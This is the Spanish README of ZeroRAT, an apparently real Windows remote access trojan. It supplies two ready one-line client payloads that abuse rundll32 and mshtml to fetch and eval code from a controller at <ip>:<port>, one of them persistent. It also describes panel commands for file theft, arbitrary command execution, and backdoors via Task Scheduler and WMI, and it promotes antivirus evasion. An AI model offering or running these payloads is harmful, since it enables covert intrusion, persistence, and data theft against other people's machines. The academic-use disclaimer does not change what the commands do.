
ZeroRAT es un control remoto de una sola línea para Windows.
#ZeroRAT ##Introducción Herramienta de control remoto (RAT) para Windows. El cliente solo necesita ejecutar una única instrucción; utiliza programas nativos de Windows para ejecutarse, no escribe archivos en el disco y cuenta con características naturales de evasión de antivirus. Deja de funcionar tras reiniciar.
En el programa, "download" y "upload" se refieren a la perspectiva del cliente. Cuando el cliente descarga un archivo desde el servidor se llama "download"; cuando el cliente sube un archivo al servidor se llama "upload".
##Configuración Modifica la dirección de conexión del cliente y la contraseña de administración del panel en config.py. Recuerda comprobar que la depuración (debug) esté desactivada.
El programa depende de Flask y sqlite3; instálalos tú mismo con pip.
##Cliente
Reemplaza <ip>:<port> por la dirección de conexión real.
Versión normal
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
Versión persistente
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##Servidor
Panel: http://<ip>:<port>/server/
Los comandos compatibles con el servidor son:
sessions Lista los clientes activosuse <id> Selecciona un cliente según su idset <key> <value> Establece variables globalesshow globals/downloads/uploads Muestra las variables globales, los archivos que el cliente puede descargar y los archivos subidos por el clientedelete session Elimina el cliente actualdelete download/upload <id> Elimina archivos según su idupfile Sube un archivo al servidor y lo añade a la lista de downloadsdownload Establece las variables download_file y download_save_path para que el cliente descargue el archivo y lo guarde en download_save_pathupload Establece la variable upload_file para que el cliente suba el archivo en upload_file al servidorbackdoor tasks <time> Deja una puerta trasera mediante el Programador de tareas de Windows; formato de hora: 00:00backdoor wmi Deja una puerta trasera mediante WMI; se ejecuta una vez cada horaExcepto los comandos indicados anteriormente, todo lo demás se ejecutará como un comando del sistema de Windows.
Consulta los detalles de los comandos en /static/js/xkcd_cli.js
##Desarrollo Comandos del panel que gestionan el cliente: /static/js/xkcd_cli.js
Comandos del panel que gestionan el servidor: /controllers/server.py
Mantenimiento del cliente: /controllers/client.py
Generación del payload del cliente: payload.py
Operaciones relacionadas con la base de datos: /models/
##Contacto http://5alt.me
md5_salt [AT] qq.com
##Referencias https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##Descargo de responsabilidad Al usar esta herramienta, cumple con las leyes locales. Solo debe utilizarse con fines de prueba académica; está estrictamente prohibido controlar ilegalmente equipos ajenos. Si se causan daños, el autor no se hace responsable.
##License GPLV3
##TODO
meterpreter shellcode Instala Meterpreter mediante shellcode con InstallUtil; primero debes establecer LHOST y LPORT (solo se pueden seguir recibiendo comandos después de migrar; depende de .NET Framework 2.0)meterpreter powershell Instala Meterpreter mediante PowerShell (depende de PowerShell 1.0)